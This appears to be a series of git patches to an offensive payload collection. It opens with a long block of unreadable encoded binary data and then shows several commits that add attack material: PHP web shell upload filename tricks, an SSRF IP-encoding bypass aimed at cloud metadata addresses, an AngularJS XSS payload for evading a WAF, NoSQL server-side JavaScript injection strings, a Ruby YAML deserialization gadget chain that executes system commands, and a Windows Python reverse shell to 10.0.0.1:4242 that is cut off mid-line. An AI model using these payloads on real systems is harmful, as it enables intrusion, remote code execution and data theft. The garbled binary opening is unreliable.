z#W%HTeMFAispVEF{yD%XP6@)!o13`ycSEPX%fNPT&e5TP;kXYGfp-gi$zN}tQUvbe z4t_gyjxX7zT3X*?fw~cTqbHdA?k>;o-Q(K(*Wto>>X$Ea`TS`v|N0mH3mIs4nVp;C z{=}?=tb(bA0&GhwjTq1{!tPS|@!v%k3|}W%=nmwh_}5B@tZA_}j5l zUdfBa-oc!4Qh6{uVbIcOG5nb!l6yCfumHqcXj1o3Ek-+F$Jtm-SeV~rabX#WdQ6vN@jEqNIeSeeg<_Hm^*gPW3BKmnuf^*qsnZ=lxB#Eil zjkAIogBU+(iNT0rq}69^Y?P7a82xrkZk+&h3eaz}1=Jw6?#jQ|?I&f?@~0w0L_iD@ z70YIbKol9`B*sJr)dbZT6(^8HYLGYSZq@nzt7m-uhaQh__i5Ho62*#02AWc@#Tatd zR+QNp%lw>$G{qExs+i5`PC-^43JkT#^*ZiqLdzzcIMw8X8&|n>^#WU)_nE%;j0e*x zy)Go(J~Y8QIIYB56U_LaE8-7aP^8jd9t2ECCJ z{KTO!Aq!|q+51rju_izE4KffoIEEc?JJ0PO*An>lU2TP=P;$jjHiepjkx1wyF`M-{ zroaA%kxLgjd;JQWn1W`_hoq<*>k%$px{ zfppi!QX*$88liHT7f z^%`yx;9^0s7L~kW_OFBti>u+Ul29g*;Nuvzklc~803L;rHV`-v-lCKJP2?-=iOS?# zwc<`R#3Iy

&5sy~X1%Zjzmz;_oh=<>W7aPUGYWQUlg1wKPZ4l=1O#;#QL^5=^~D zo~J~bLoI*N&q?;vBxSz>RPC|1K+@?cT?Jo)#VybrrX@TwZO@fA8_@?hy268PV#)=&!l;W z#icRw)RM0Wwl#t#5vKkWQ_IO!QEdX7sE(888EdOG?%jUQ$A8yhq%q3H8)KZjoUqod z)7gwr3sI}i*a_v_njE-zFQa7w^^|96>am~A}bIK530W}#KwXxAMYDOW-k!aIxk5$xK(l}zW zX}NrPl&e?Iqglk``>RafU8mn0MKZ-CMc{}Q{&6?7sYP-j?O3vIhS8jnhSC~Q;*loZ zbc9+GF*=%a=4{MJGe+|oHjTj=zaKK^Ce|D&2kxpQj8N_2`u-XqM~$Lla9KAFD}t3G zzS3KoaWw|jdgpUdisr2iTng-DuLo&28}LEcG{jdh*nd1%8QcC2vE$O&!}ojnQ8@?( zF>FOhhmB&Qq~Z^Ii3)xV z-WmZo9L%}Lou-k$f%~CaKs9B3v&MtFUH$AAn@LM67oQ#}s~K z6(>5J0F01i1U2JWRaCoR4JNTZ8@5Iy(I6fUiz#M_s@NP>mXxK1b^5)WPd@z#-K_*8 z|IPhdXIWgVlV!rWb6fo8x2O5|lYgYwY4C6V_qTlg*EzZy&Q)Ee-WP#(CWE*GiACZV ziDHO_NEDkXQ8#5|QaO8iiEHmqaQ@s0Ru(pSe1DC(XHCd5L|w6FRiA88#`GyzCF=`M zre~RZI>+^oTDUI#B%-p3C717EYJ5?Tkewfimcr}t`cF- zxqW>{^zt$iaq)(lxWx^)GCDCTPMnJ|POxK86QR;`P44{qv@8ozJzwQ@$GE^7=hX*E z{9UD(pos`Y-jk|gjVrs9i}&>H>yyRbM0C$0aA4(l-5c3%MS6dHbK78xWc$5)5AQil zii=qWH(&qQ_&C6^Sm@fAjp;@1{N+n7eDo1hljAhrJHyiIGEZ;aXYT%EMw=}*dR^AK zZE_=+TFl9_r}@pV|DMy4kS;Cp;EOMq|NaLuv&xxTlgZf7N+KGO@d9w*{n@Pu^h>;= zhsNv4xxK$@w^+YYFTG$NRJ}LD`@|bs4uHLVgZ)f2!HqS8Y3J~kO8H;u?K%M78UYBq zAJCU9&Co7Vw^Ky7uxZTlg5jGlA9C%ZZ-_=N@xg~z`0QUUaprQy2S1zV;oXOtaMph>!H5%NVjX5n`v?wItvtvcMCYt=h~UMBoML6>T;9mI}iExt22D~$vHm##dStoHST^i z&HU^$(w^|%l^gu*vrjpH=^S&9dyJiE62%71QZN?HViY0IGSV!=l5+au7@z+76zl7= zO#hJb{8^3l^*)A}X01kRq|N*9U*XEtQ5tpO+piw;^x--iYYoJ<5mN^;RGkPGv92{9 zidrS@2{Vu8dG_!b?Tyo1zjl^?{?|{L7{ANRlXXs=>GAR3UFCxtC&>G4o;-NYlLrfQ z+kJ0|Y?i`U@QF1=;qCI=iOciImAgr>5`pBH$hcyx###SzHNIGkw-8F?-1)lw5*_>- zcw5=8k8xl@9(vBNrg-&r*SxQ@q1kFN+8S}O96 zrBO_Ze}?X1e>-oL0Ng*NF?R5yHDc|vxe@dDL5n~9?*}v+ql`D-=j569Iq{3LT)*Do z*(Y;sthW(SPMtZyx$|eKMWZ}>xWeOmIg9faYzi8a^)ois5`OsRIVaCfFnQ_vTAEYJ{`r#z|y^AHG`T%RfHl+b>g=mq$^%fohIKxa0%1P{zIa18JQp zN~{ID1@IT9=7=a8>xO%`w)n&UzQgFq z39eqd%&-69Dwi&Q!1B@>X+P)exeJ^+eV!~cY^^`0-*vGoHp;+u!8Fm_vbCYCFGaLB zVosg7#Am<$E#u8C{$1|S-B@I0rHx54lBCVlNyEoKy~z2C<78=<+uz@3{#j0^8(~~s z8)rci_nikfHG{QEzc0+sMNHp)&ZB#4-1zAQKK=Pg&Y!=`?92>PQ)8UJaGI&{3*7qp zIXAz4#FK~fbUF&w_?W&N>=sO%s{|##04Of zcjD4l86kOwO}FUC6yJT3({F#z{L?nS`ll;gyD`qm)8kybagjXlA=GI$CRktXa`)y8 zfBnO4KL76-W*!?P@1nLw-rJxfqkQ$3dvyDoY_?bUC4kp|g?D-)fO{H^{RNd6r;%787NpY0T3{E&l7@7clZQzx|hpPk-?N7vHRo4d(H8JiJC z;XvRRp@Y~<8AOdlB1mKy#V{I=us*s*=jj|FiMW)dWNC(y zgMnH-fqE03FS7Y;j*Xe;$XJiM8Fe-Pq~hV>DA;ZTM~!zt0OG};`riga1CbHv_GzzV zOn)D1u)PbCnsZd zsm|^1*6DOV=lR?`XD-wk8SR4hFm{yQ7CgDX!4F@}@%X_wX}6E&xwCXhhLQqFB}>(m zfsY!y3^PMYr>#7FxXl0e|9p;`Egsx`PN&^PX&@1pD5uv;nSHjxAOGun&R!T}=J7gP zn=SGbNK-^M!Pe+?nmnJ4_{;C7SzGOL_s)IBCSpvaSWQ8jJel6&_RU3Zem%|lYJ)5V zmki-znflLnp@V_ zQvUkKyKHqj#7y$&!7S}|7r|mA10s%6CSKqW(On+~-Z2KTm%~IN7;)7LT1lO8+oAV( zp4q$8ocrM(jT;}pNE4~M`F*4f67_M)qRvaPzQOaazvG8Lea_nSET+|@DbBqd%kE`+ zf)ETG6z_ll^scs&$s0_jo?5 zEH0izHKlHQu1t)kE)k^GV`C%Y-ko(eHf}OLl@P^Ux}64dPrEFym43U&$88CW9G>c{a)Q=QKCafFaWRHF&cJ~MGjM!Rsaj^jv42-7=7`S8 zq-9ocX%!?Q7FV*R-bLaPe zrdwZNB5KhvzT-zFwzQgx5~dr0gW`w_z-l1AD~aODD>y+VC}Ip^+t>~)%tS2CHxV=D zvT`LtNPrfu{74V7b)vk5smHEBv$5WSrx;1GJz*=2nciw3MqEE)1fk~J5?dF8M@re* zLIkj&HBi^OY!FloMW@Lk(*S094ZuqvocT*3Ib4|$AgM0>N#gS#t;iBQ|e zrYVtWLd_>RhymKDtAtY?h+&CUM?({e;E%Le~nqN#0FZ z%?xX6eZ*MT``C7|y*@SviTXq)=Ir?^e0bwi8uha*&cl;OoAmp+i>Jh8O^RtEl2g|2 z^BKCTg}|y2i$(J`X}iPhqfzFbPJyYpeP(miW@wfZv4x?DL^V`}+}A}^>9etsuz7bG zkyR`an$@srhNJ?Kck7Dac8Iga_B#>J=Q0)+)``swaWqE1m%2zrsa2A%s=1v0TpTIsw#3!f~m$-thW^Q7LC8ik(n`0fG{O)sRR+rgaTjP^o|2>m8Za}l) z2YWwj*xX?K@ngRE-GA}rzx@YK7r&!XYcUcDBcd4bJ=nE!iz@?=ch98VZRiQZQQ&19 zeE~Q$|1QcL_!29=Rv;R=_i;iI5Q8xpqD{n3A^iwVa^J7FXisKW{{`eJ#4xl378o0 zZOqg_-Xza+kj%G~Yq)(NMT)h>3|3+fwZt{Xm2UgcNe+!?QK2sT!%buQwfSTq!s5i3raFw!1BWFYv$;eWRocEzf1T{mdW zmKZ}L5^T~SJ-bf(=6$}g%Iw|SOkR2qX}Zb;)+#p5=xuJYy0E~^_qSPJx=*9kVj?n( zL_#bw-1FCGgjVO6VWJT@2#&Y_)JjUGzxms0WSN(RBF>tZs}~(Op@l`f#Zc6{B8`PQ zZe3DXd7Nt!61U0-s+XX6OQcYgbTK#)QWVltoJCGilR>$B5rbAuEGYa+MV733eW6G( z@08rRLW|eSm^AT1)3-U3!b*{XM3`EH^!>h|cz?0?w2VbWyz$VlMp3A%vy#G42_msx za5rLvHp>egZhrlc`*&ve?#st4%)8>;ZZPYB)(0!s6sRNWMYR{6TkOQq-LjQu8l3@#@_1#utAs_Cm2L|C}m$miv*oBJ#rMdyJ@9 zc(<#((gzsi-@A^G`l!@y;ER)00rIqZqOr z@@`7L(WTEOX{*CXtIkAh7>|Ue5fURr#@BQ$+E@BJK|AWinh*rR*Ea9&Wwq+eQrg37M3AbiJEFz6V;;3i8`yG z>4C-wu@gNoXhAEu_>ck_{v0h95-%c)kw6FTV)K8j=@>WUk=_E77rh*~BQc>$_EImcKx z_^b75X3>XzmEaWx;Ylx)ARueX|b<)(5<9ze+*0Ii6J_AvQ@&pD3l$@Vig(H8s3ZtE&H@%u8Bd0<>tg*y z$BAmcTLC4bur!LBqE>`wMf?f=^CBnuM4cDbyA_J+b}E(q>3=Iu7!|Wn^@6&rUs&!7 zw~cuQo9lf#n>kjMv=8*Rkfi4Kp%+;iQx&W({;pUj?mOa^6;rXWl&xYa$J`9QNAZP4 zieA2jX!9;-yvtqyVlagZzc^JaMStM(xRq|-?SguHRj%seU=ez|dEGmxR36FD8T>}_ z!u=%|&aO90dDVL*R-8Q|QVc)Nq~OJ%jbn^8B#|-(q$oL-Ox=%&5*a4|TVD9pjre}Q z;=7_(3)eed&jAsX;=9B_k26PD09Gm5DmjZ<+3uwf2iv?fssk6J(@uqD4F*^E;BwQ# zDpp<5uE#-#G(u@ZltP{u&NpNj$0VhU3lg6}50w42O?x5lhyaA43vp=5 z21PQ1|HHY6MZKk{xSVY%1WFae;62{2JR}aKqW9dTE`!%go#--62LdqhFUZi0esI96 zAM9^8UKkCRAla^b3TvD%aZ6ieI1IOMJH=JAcL_C=>Vq+ZS(2$(0E-n?#lS1KMFv;sUfwb| z&BJ;2rm5aiD!1X`1=NYSTI6E*>ROyTMIq_Ixm3D$1wV->CceegqFCwn@wg%a1Md*S z_rp@U_`g;CVB-sY-e56%Kj>j)j&GSw)YRT=+36%#rB7x`K?A@ zbS1oCVXC)VcWx9>wutyvUFz$$IrbBzKd|oXZEJ$<@5exP{cFbv?JamliW}=*j+T1k zfl`ehFYgyS#_yMp=WjQA9~%eP(&3D$A~LWq9QfK{KWiRLB8x<$VI8qkc_^+?gTFuS z^Yf~_8v<|-4DFr+x^{} zcrR*oDkFmh7z}d5R+D0R-NPsCvb95ZQ>mJJQDz)r{wuHL;; zu4j)6hy0@-j~)Bnn{M}iJhbx2c}rZKL4WR)bz)@~^YBqV`g`B@a%A4|{SS`q)4PLS z^Io^R7(1%w99wlx0pjE2RU_Az-Zovuj$-?F^QP^AV^8UO%W^3;=e>a2NyMbFu5g2%LRFCxmuF*dl*mcV>up)Yf&yJyi?wzK(M-HRx zO|`)GA=noykM^>5DT{6>kb9j{)S4Wu$<@fkTGYBsPG^LYZTITEf1~3i01t6C0r)N? zl;Uqs*1yW*iXrf=Vf*&&_KNO0I946mvWv@fy9Mw7*nNur;$=(I>#Nu?y?Vj>-u;33 z_~Kl@MwQ5yjdFqg85Zk;{fi_q*=^w8{rulwR&NnY_BM?W?><#e&jGLbHAal%F~%qZ z;irc(4*8AYgsNhsq>!5Yt}Tk6(GZ94i5Mn8T(! zVJn~TGVS4wT)QpuRt@cbc2WI%S5(Vn8t^Bg*GOeKmTgy>4lP|Vm->rgUxDricoh#F z!xyP>+3khnF)$xD6m{i0tkSYMv1Zh;7=cs`neEfJDc#%@X<+O=Vc7ZiZnp7PZ%^P& zQ`&Y9d~nts|5iWsMWHLz_Z~g=;RfD^b^LX3V(YLzVIRk5n-(ZUpL$Vf6|y`h&vUF= ztSV}K6uT(K-;M@yQ%hgxtG?Z_5`c$EX`HXPa$mIb#ajsWqR@X#Wc!)F8MVCcI@;tZQPzXplB>|S zEsX7AB*Ip1Si9GVtWGXoLsW!Q?nhyJJ-&mbdfVRSZ_&!*%JMs&Ix6h?eRjv$4Gv!b z4&p5je9il~cfR0hb?#uRkY+ilwd9(kTC{t0=ZxLW*^MZ+^O60;GIf8>=;7B0|v58OvHqBXE zTj61r)6Q~6*Sai6ImR?FW)mYZA{LPh!QzHj-{P=rbyyAR2KFHUOUH3&2Kz=SN3X+C zfP0P?A9~Y~J>+bs;rjd?NX_miqi{^+I|t69cs)?=fS z(QmqX!hh?ok;$=%qk1;Il@tY)UuL{^hxzSr0he_O5A-4{qIZ3Eq`qSIJXCA1Fa_>) zdvx3HK;WS8Ed`Ci<`$DdltO|qYLtlx>S>NUXI(8fiDOI@;rdGZTe~W*&7l9G_#0m& zey=wni;&`aVh7$7h4?!x`>U2MCwIKUj-vEOdAw8KeQD1E(E2u{+xNjiY>PqF9HIcU ze!KUu?HVJ*6g}wGifdeD3`ztNk!eOh@6nG^x=BPQ657#=-^;>?b*)Q9qE|1z zPgE5&N6q&Aeh|n&?CKu2U2;TH5Z|9Z5^T&+9bHw6CK*bNJT_#wiR9mUW&{CvNW4r= zl?UxD8ONmv!aJ~mMz%eA#k%EnXSHw14h+206av86^DJ72yl=?Wk|scuAtrI53^8EU z8!akX!Gi1m75O$qMSDouj{w{y*gNn>ILwf{()+T#C6s&e@ILsBv&;8<>7s=N>yV-^ zi`m&huYTXhE&?nfx%bB5t7^1C8qNwxAyma@|L&3)^cn;Kc)%1DLS7}O-j>T+l(JOI z!Ecj#OQ3%o2plPVCS92Y>Pj#WgG~~0a#X-b!&%T(5aT2DiW`{wt5}_XJh&F*MfIQp zZy$#-goR`OYL3l*9|%09sPmVjSipGezbTg-78$R%lY#&|4BpC&))#ZQ31va}1&%TU zH%qmOMJ~`o$c&I67?mVpZ^E|Z}!KMDi_9%s~( z(iJRP@gr0XOGDysuO^vv<#gaG zHeNLDHKj9H00V(Q;1!gKAPQx+hYlX@7@UK_FAxa)EmVY@zQDgL+a8y3$9w#UAOHh_ zK;RX;Fw<^ZCxPvC`pVdx>Pq(Rp$P;6$Be@LTkZ2J+g%Jg^yJX^vY$A>AOHh_K;R`5 zDIB`(iC5LPtfqdHkAwIN1OgSxh(15a3^h;KrshN|slYlkD)BmDCqV!P0)fCQ*e=?n zs_tI0;86aayl}BVAaG34GNMF=W{lgt2~{KD!11uV6>zTv0T>7b0((4-m>;@nX z(El?8SrUK&1Y{pDR0fAPh@I>P*KoWC>>rStK1r}kff2wVV+@Hzopr0Dkmg@c;k- From b1ce7a254704aa60af2036798aba3077159c1cca Mon Sep 17 00:00:00 2001 From: nismo-s13 <56898573+nismo-s13@users.noreply.github.com> Date: Wed, 24 Nov 2021 17:55:13 +1300 Subject: [PATCH 02/69] Rename shell.gif?shell.php to shell.gif^shell.php --- .../Extension PHP/{shell.gif?shell.php => shell.gif^shell.php} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename Upload Insecure Files/Extension PHP/{shell.gif?shell.php => shell.gif^shell.php} (100%) diff --git a/Upload Insecure Files/Extension PHP/shell.gif?shell.php b/Upload Insecure Files/Extension PHP/shell.gif^shell.php similarity index 100% rename from Upload Insecure Files/Extension PHP/shell.gif?shell.php rename to Upload Insecure Files/Extension PHP/shell.gif^shell.php From 410758cf80ec22e048edf255b3fc59e57b6c3a4b Mon Sep 17 00:00:00 2001 From: nismo-s13 <56898573+nismo-s13@users.noreply.github.com> Date: Wed, 24 Nov 2021 17:55:52 +1300 Subject: [PATCH 03/69] Rename shell.jpg?shell.php to shell.jpg^shell.php --- .../Extension PHP/{shell.jpg?shell.php => shell.jpg^shell.php} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename Upload Insecure Files/Extension PHP/{shell.jpg?shell.php => shell.jpg^shell.php} (100%) diff --git a/Upload Insecure Files/Extension PHP/shell.jpg?shell.php b/Upload Insecure Files/Extension PHP/shell.jpg^shell.php similarity index 100% rename from Upload Insecure Files/Extension PHP/shell.jpg?shell.php rename to Upload Insecure Files/Extension PHP/shell.jpg^shell.php From 342b1f4f6072a5d8223f84b8c360d5bfedf134f0 Mon Sep 17 00:00:00 2001 From: nismo-s13 <56898573+nismo-s13@users.noreply.github.com> Date: Wed, 24 Nov 2021 17:56:20 +1300 Subject: [PATCH 04/69] Rename shell.png?shell.php to shell.png^shell.php --- .../Extension PHP/{shell.png?shell.php => shell.png^shell.php} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename Upload Insecure Files/Extension PHP/{shell.png?shell.php => shell.png^shell.php} (100%) diff --git a/Upload Insecure Files/Extension PHP/shell.png?shell.php b/Upload Insecure Files/Extension PHP/shell.png^shell.php similarity index 100% rename from Upload Insecure Files/Extension PHP/shell.png?shell.php rename to Upload Insecure Files/Extension PHP/shell.png^shell.php From 3c441669d81f187edd5be0884eb42238ceef6ead Mon Sep 17 00:00:00 2001 From: Aj Dumanhug Date: Sun, 13 Mar 2022 01:30:37 +0800 Subject: [PATCH 05/69] Update README.md --- Server Side Request Forgery/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index ed8dd5c..bb0d667 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -573,6 +573,7 @@ http://0xA9FEA9FE/ Dotless hexadecimal http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow http://0251.0376.0251.0376/ Dotted octal http://0251.00376.000251.0000376/ Dotted octal with padding +http://0251.254.169.254 Encode 1 octet of the IP address or 2 or 3 (Just don't encode all) ``` More urls to include @@ -856,3 +857,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) - [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html) - [Attacking Url's in JAVA](https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/) +- [SSRF: Don't encode entire IP](https://twitter.com/thedawgyg/status/1224547692967342080) From 507c493db2b7b8333e8d5a69f4049a9446359129 Mon Sep 17 00:00:00 2001 From: khiemtq-cyber Date: Sat, 7 May 2022 12:55:15 +0700 Subject: [PATCH 06/69] Update Angular XSS --- XSS Injection/XSS in Angular.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/XSS Injection/XSS in Angular.md b/XSS Injection/XSS in Angular.md index 629699b..effb406 100644 --- a/XSS Injection/XSS in Angular.md +++ b/XSS Injection/XSS in Angular.md @@ -175,6 +175,12 @@ AngularJS (without `'` single and `"` double quotes and `constructor` string) {{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} ``` +AngularJS bypass Waf [Imperva] + +```javascript +{{x=['constr', 'uctor'];a=x.join('');b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'pr\\u{6f}mpt(d\\u{6f}cument.d\\u{6f}main)')()}} +``` + ### Blind XSS 1.0.1 - 1.1.5 && > 1.6.0 by Mario Heiderich (Cure53) From af973ef0ad729597d8c7e3f9d39a7f4bfcb293b7 Mon Sep 17 00:00:00 2001 From: Sanjay Das Date: Tue, 17 May 2022 09:53:37 +0530 Subject: [PATCH 07/69] Added basic SSJI paylods --- NoSQL Injection/Intruder/NoSQL.txt | 3 +++ NoSQL Injection/README.md | 13 +++++++++++++ 2 files changed, 16 insertions(+) diff --git a/NoSQL Injection/Intruder/NoSQL.txt b/NoSQL Injection/Intruder/NoSQL.txt index c00e486..535cb4d 100644 --- a/NoSQL Injection/Intruder/NoSQL.txt +++ b/NoSQL Injection/Intruder/NoSQL.txt @@ -20,3 +20,6 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi ';sleep(5000);' ';sleep(5000);+' ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); +';return 'a'=='a' && ''==' +";return(true);var xyz='a +0;return true \ No newline at end of file diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md index a37eb71..857de97 100644 --- a/NoSQL Injection/README.md +++ b/NoSQL Injection/README.md @@ -19,6 +19,7 @@ * [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap) * [nosqlilab - A lab for playing with NoSQL Injection](https://github.com/digininja/nosqlilab) +* [Burp-NoSQLiScanner - Plugin available in burpsuite](https://github.com/matrix/Burp-NoSQLiScanner) ## Exploit @@ -70,6 +71,14 @@ Extract data with "in" {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}} ``` +### SSJI + +```json +';return 'a'=='a' && ''==' +";return 'a'=='a' && ''==' +0;return true +``` + ## Blind NoSQL @@ -165,6 +174,9 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi '%20%26%26%20this.passwordzz.match(/.*/)//+%00 {$gt: ''} [$ne]=1 +';return 'a'=='a' && ''==' +";return(true);var xyz='a +0;return true ``` ## References @@ -173,3 +185,4 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi * [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection) * [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists) * [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb) +* [Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java) \ No newline at end of file From eb933317d0d641dc5917ccecffd8cf63aca98732 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mi=C5=82osz=20Skaza?= Date: Wed, 1 Jun 2022 09:55:48 +0100 Subject: [PATCH 08/69] Add new ruby yaml gadget chain --- Insecure Deserialization/Ruby.md | 29 +++++++++++++++++++++++++++-- 1 file changed, 27 insertions(+), 2 deletions(-) diff --git a/Insecure Deserialization/Ruby.md b/Insecure Deserialization/Ruby.md index 6263526..79c91e7 100644 --- a/Insecure Deserialization/Ruby.md +++ b/Insecure Deserialization/Ruby.md @@ -16,7 +16,7 @@ require "yaml" YAML.load(File.read("p.yml")) ``` -Exploitation code +Universal gadget for ruby <= 2.7.2: ```ruby --- !ruby/object:Gem::Requirement requirements: @@ -29,9 +29,34 @@ requirements: spec: ``` +Universal gadget for ruby 2.x - 3.x. + +```ruby +--- +- !ruby/object:Gem::Installer + i: x +- !ruby/object:Gem::SpecFetcher + i: y +- !ruby/object:Gem::Requirement + requirements: + !ruby/object:Gem::Package::TarReader + io: &1 !ruby/object:Net::BufferedIO + io: &1 !ruby/object:Gem::Package::TarReader::Entry + read: 0 + header: "abc" + debug_output: &1 !ruby/object:Net::WriteAdapter + socket: &1 !ruby/object:Gem::RequestSet + sets: !ruby/object:Net::WriteAdapter + socket: !ruby/module 'Kernel' + method_id: :system + git_set: id + method_id: :resolve +``` + ## References - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/) -- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) \ No newline at end of file +- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) +- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/) \ No newline at end of file From f6c455d8f96dd0c29c94bf82eddf41e7ef1d8776 Mon Sep 17 00:00:00 2001 From: fantesykikachu Date: Sat, 21 May 2022 13:06:52 -0600 Subject: [PATCH 09/69] Windows Python3 Reverse Shell --- Methodology and Resources/Reverse Shell Cheatsheet.md | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index e1da152..b171d23 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -159,10 +159,16 @@ IPv6 (No Spaces, Shortened) python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' ``` -Windows only +Windows only (Python2) ```powershell -C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.0.0.1', 4242)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" +python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.0.0.1', 4242)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: 